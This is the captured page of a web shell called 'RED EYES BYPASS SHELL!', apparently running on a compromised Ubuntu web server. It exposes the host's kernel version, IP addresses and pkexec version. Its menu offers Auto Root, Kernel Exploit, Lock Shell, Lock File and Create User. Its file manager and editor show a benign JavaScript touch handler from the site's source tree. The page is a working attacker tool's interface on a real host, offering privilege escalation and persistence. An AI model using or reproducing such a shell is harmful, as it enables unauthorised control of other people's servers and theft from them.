Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
pdpa /
src /
js /
mdb /
util /
touch /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
index.js
1.21
KB
-rwxr-xr-x
swipe.js
1.92
KB
-rwxr-xr-x
touchUtil.js
465
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
import Swipe from './swipe'; class Touch { constructor(element, event = 'swipe', options = {}) { this._element = element; this._event = event; // events this.swipe = new Swipe(element, options); // handlers this._touchStartHandler = this._handleTouchStart.bind(this); this._touchMoveHandler = this._handleTouchMove.bind(this); this._touchEndHandler = this._handleTouchEnd.bind(this); } dispose() { this._element.removeEventListener('touchstart', this._touchStartHandler); this._element.removeEventListener('touchmove', this._touchMoveHandler); window.removeEventListener('touchend', this._touchEndHandler); } init() { // istanbul ignore next this._element.addEventListener('touchstart', (e) => this._handleTouchStart(e)); // istanbul ignore next this._element.addEventListener('touchmove', (e) => this._handleTouchMove(e)); // istanbul ignore next window.addEventListener('touchend', (e) => this._handleTouchEnd(e)); } _handleTouchStart(e) { this[this._event].handleTouchStart(e); } _handleTouchMove(e) { this[this._event].handleTouchMove(e); } _handleTouchEnd(e) { this[this._event].handleTouchEnd(e); } } export default Touch;
Close